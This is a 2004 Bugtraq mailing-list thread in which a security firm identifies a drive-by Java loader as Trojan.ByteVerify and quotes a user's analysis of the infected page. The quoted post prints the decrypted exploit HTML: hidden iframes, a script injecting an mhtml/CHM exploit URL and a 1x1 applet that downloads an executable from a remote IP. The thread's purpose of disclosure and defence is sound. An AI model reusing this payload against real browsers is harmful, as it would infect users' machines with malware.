'Re: Strange Java Loader (not so strange - Trojan.ByteVerify)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: Strange Java Loader (not so strange - Trojan.ByteVerify)
From:       K-OTiK Security <Special-Alerts () k-otik ! com>
Date:       2004-12-30 20:55:34
Message-ID: 20041231015802.17957.qmail () www ! securityfocus ! com
[Download RAW message or body]

In-Reply-To: <116798078.20041230073423@gmx.net>

> so far, anyone knows how to protect from this crap?

Update your Windows and your antivirus software !

this attack is known as "Trojan.ByteVerify". It exploits the "Internet \
Explorer/Outlook CHM File Processing Arbitrary Code Execution Vulnerability \
(MS04-013)" and the "Microsoft virtual machine Remote Code execution flaw \
(MS03-011)". 

<Symantec>
When Trojan.ByteVerify is executed, it performs the following actions:

Escapes the sandbox restrictions, using Blackbox.class, by doing the following:

Declares a new PermissionDataSet with setFullyTrusted set to TRUE. 
Creates a trusted PermissionSet. 
Sets permission to PermissionSet by creating its own URLClassLoader class, derived \
from the VerifierBug.class.

Loads Beyond.class using the URLClassLoader from Blackbox.class.

Gains unrestricted rights on the local machine by invoking the .assertPermission \
method of the PolicyEngine class in Beyond.class. [...]
May attempt to retrieve dialer programs and install them on the infected computer. \
The dialer programs may attempt to connect the infected computer to pornographic Web \
sites.

Threat Known As :
Exploit-ByteVerify [McAfee]
Trojan.ByteVerify [Symantec]
Exploit.Java.Bytverify [KAV]
JAVA_BYTVERIFY.A [Trend] 

Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com 

> 
> Hi People,
> 
> before reading this,
> dont go on any of the sites
> unless you are sure ;)
> 
> after decrypting some stuff, this is the source from:
> http://xxl-size.com/cogo.html
> -------------------------------------
> <iframe src="http://209.8.20.130/dl/adv346.php">
> <iframe src="http://www.awmcash.biz/adverts/14/1.htm">
> -------------------------------------
> 
> this is the source from one of the iframes
> (http://209.8.20.130/dl/adv346.php):
> ----------------------------------------------------
> <html><head>
> </head><body>
> <textarea id="cxw" style="display:none;">
> &lt;object data="${PR}" type="text/x-scriptlet">&lt;/object&gt;
> </textarea>
> 
> &lt;script language="javascript">
> document.write(cxw.value.replace(/\${PR}/g,'&#109;s-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
>  &lt;/script&gt;
> &lt;applet width=1 height=1 ARCHIVE=loaderadv346.jar \
>                 code=Counter>&lt;/APPLET&gt;</body></html>
> ----------------------------------------------------
> 
> the jar archive loaderadv346.jar contains some java classes
> which exploits the URLClassLoader bug (BlackBox.class).
> it overrides the sandbox and downloads a loadadv346.exe from:
> http://209.8.20.130/dl/loadadv346.exe
> 
> this seems to be a dialer or something like this,
> it changes the hosts file, creates some spawn files,
> you can look for yourself, i included the file
> and the java stuff, the loadadv is upx'd,
> 
> so far, anyone knows how to protect from this crap?
> you're welcome to send some solutions ;)
> 
> cya, Stefan


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic